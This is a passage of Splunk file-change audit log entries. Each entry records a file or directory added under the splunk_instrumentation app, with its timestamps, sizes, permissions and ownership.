2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.797, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/dataPoints/spl_data_point.py", isdir=0, size=1696, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.793, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/dataPoints/report_data_point.py", isdir=0, size=1583, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.788, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/dataPoints/mock_data_point.py", isdir=0, size=460, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.785, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/dataPoints/data_point.py", isdir=0, size=685, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.781, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/dataPoints/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:43:03.778, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/dataPoints/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.772, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/searchcommands/validators.py", isdir=0, size=11946, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.767, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/searchcommands/streaming_command.py", isdir=0, size=6824, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.763, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/searchcommands/search_command.py", isdir=0, size=39411, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.760, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/searchcommands/reporting_command.py", isdir=0, size=9720, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.753, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/searchcommands/internals.py", isdir=0, size=28838, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.749, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/searchcommands/generating_command.py", isdir=0, size=17716, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.745, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/searchcommands/external_search_command.py", isdir=0, size=7895, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.741, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/searchcommands/eventing_command.py", isdir=0, size=5478, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.734, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/searchcommands/environment.py", isdir=0, size=4706, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.730, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/searchcommands/decorators.py", isdir=0, size=15843, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.726, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/searchcommands/__init__.py", isdir=0, size=6037, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.620, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/modularinput/validation_definition.py", isdir=0, size=2775, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.614, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/modularinput/utils.py", isdir=0, size=2665, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.609, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/modularinput/script.py", isdir=0, size=6643, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.605, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/modularinput/scheme.py", isdir=0, size=3073, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.600, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/modularinput/input_definition.py", isdir=0, size=1888, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.594, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/modularinput/event_writer.py", isdir=0, size=2954, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.588, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/modularinput/event.py", isdir=0, size=4479, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.583, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/modularinput/argument.py", isdir=0, size=4219, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.578, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/modularinput/__init__.py", isdir=0, size=423, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.471, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/__pycache__/six.cpython-37.pyc", isdir=0, size=26883, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:16 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.467, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/__pycache__/six.cpython-37.opt-1.pyc", isdir=0, size=26883, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.462, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/__pycache__/results.cpython-37.pyc", isdir=0, size=7966, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.458, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/__pycache__/results.cpython-37.opt-1.pyc", isdir=0, size=7966, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.454, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/__pycache__/data.cpython-37.pyc", isdir=0, size=7330, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:16 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.449, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/__pycache__/data.cpython-37.opt-1.pyc", isdir=0, size=7236, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.445, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/__pycache__/client.cpython-37.pyc", isdir=0, size=132079, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:16 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.440, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/__pycache__/client.cpython-37.opt-1.pyc", isdir=0, size=132041, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.436, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/__pycache__/binding.cpython-37.pyc", isdir=0, size=50609, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:16 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.431, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/__pycache__/binding.cpython-37.opt-1.pyc", isdir=0, size=50609, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.428, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/__pycache__/__init__.cpython-37.pyc", isdir=0, size=428, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:16 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.423, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/__pycache__/__init__.cpython-37.opt-1.pyc", isdir=0, size=428, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.319, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/six.py", isdir=0, size=34074, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.316, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/searchcommands", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:03.312, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/results.py", isdir=0, size=10889, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.308, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/ordereddict.py", isdir=0, size=4223, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.304, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/modularinput", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:03.300, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/data.py", isdir=0, size=8551, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.296, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/client.py", isdir=0, size=143118, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.292, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/binding.py", isdir=0, size=58115, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.285, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:43:03.278, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunklib/__init__.py", isdir=0, size=795, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.173, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing/__pycache__/query_runner.cpython-37.pyc", isdir=0, size=2604, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.167, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing/__pycache__/query_runner.cpython-37.opt-1.pyc", isdir=0, size=2604, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.161, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing/__pycache__/instrumentation_index.cpython-37.pyc", isdir=0, size=3344, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.156, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing/__pycache__/instrumentation_index.cpython-37.opt-1.pyc", isdir=0, size=3344, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.149, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing/__pycache__/event_writer.cpython-37.pyc", isdir=0, size=3006, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.144, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing/__pycache__/event_writer.cpython-37.opt-1.pyc", isdir=0, size=3006, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.140, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing/__pycache__/__init__.cpython-37.pyc", isdir=0, size=178, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.136, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing/__pycache__/__init__.cpython-37.opt-1.pyc", isdir=0, size=178, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.031, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing/query_runner.py", isdir=0, size=2258, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.026, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing/kv_store.py", isdir=0, size=2819, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.021, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing/instrumentation_index.py", isdir=0, size=3300, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.017, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing/event_writer.py", isdir=0, size=3042, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.013, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing/base_class.py", isdir=0, size=2628, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.009, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:43:03.006, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/indexing/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.901, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/telemetry_conf_service.cpython-37.pyc", isdir=0, size=4281, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:16 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.897, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/telemetry_conf_service.cpython-37.opt-1.pyc", isdir=0, size=4281, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.892, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/swa_injection_tool.cpython-37.opt-1.pyc", isdir=0, size=5683, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.889, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/service_bundle.cpython-37.pyc", isdir=0, size=1577, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:16 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.885, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/service_bundle.cpython-37.opt-1.pyc", isdir=0, size=1577, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.882, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/server_info_service.cpython-37.pyc", isdir=0, size=1901, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:17 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.878, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/server_info_service.cpython-37.opt-1.pyc", isdir=0, size=1901, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.873, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/salt_manager.cpython-37.pyc", isdir=0, size=3155, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:17 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.869, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/salt_manager.cpython-37.opt-1.pyc", isdir=0, size=3155, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.865, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/report.cpython-37.pyc", isdir=0, size=4149, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.861, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/report.cpython-37.opt-1.pyc", isdir=0, size=4149, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.858, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/instrumentation_controller.cpython-37.pyc", isdir=0, size=12404, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:56 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.852, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/deployment_id_manager.cpython-37.pyc", isdir=0, size=5782, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:17 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.844, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/deployment_id_manager.cpython-37.opt-1.pyc", isdir=0, size=5782, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.837, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/datetime_util.cpython-37.pyc", isdir=0, size=4115, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:16 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.831, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/datetime_util.cpython-37.opt-1.pyc", isdir=0, size=4115, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.826, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/constants.cpython-37.pyc", isdir=0, size=3180, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:16 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.820, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/constants.cpython-37.opt-1.pyc", isdir=0, size=3180, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.813, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/client_eligibility.cpython-37.pyc", isdir=0, size=6953, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.808, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/__init__.cpython-37.pyc", isdir=0, size=169, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:16 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.802, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/__init__.cpython-37.opt-1.pyc", isdir=0, size=169, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.695, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/diag/diag_task.py", isdir=0, size=861, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.689, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/diag/diag_service.py", isdir=0, size=2884, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.685, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/diag/diag_main.py", isdir=0, size=1192, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.681, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/diag/batch_runner.py", isdir=0, size=3094, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.676, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/diag/__init__.py", isdir=0, size=209, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.569, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunkd/__pycache__/splunkd.cpython-37.pyc", isdir=0, size=2554, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:16 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.564, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunkd/__pycache__/splunkd.cpython-37.opt-1.pyc", isdir=0, size=2554, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.560, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunkd/__pycache__/__init__.cpython-37.pyc", isdir=0, size=297, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:16 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.552, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunkd/__pycache__/__init__.cpython-37.opt-1.pyc", isdir=0, size=297, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.547, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunkd/splunkd.py", isdir=0, size=2719, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.541, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunkd/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:16 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:43:02.537, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/splunkd/__init__.py", isdir=0, size=106, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:02.429, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/packager/__pycache__/send_log.cpython-37.pyc", isdir=0, size=5634, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.425, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/packager/__pycache__/send_log.cpython-37.opt-1.pyc", isdir=0, size=5634, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:02.417, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/packager/__pycache__/send_data.cpython-37.pyc", isdir=0, size=2697, gid=41812, 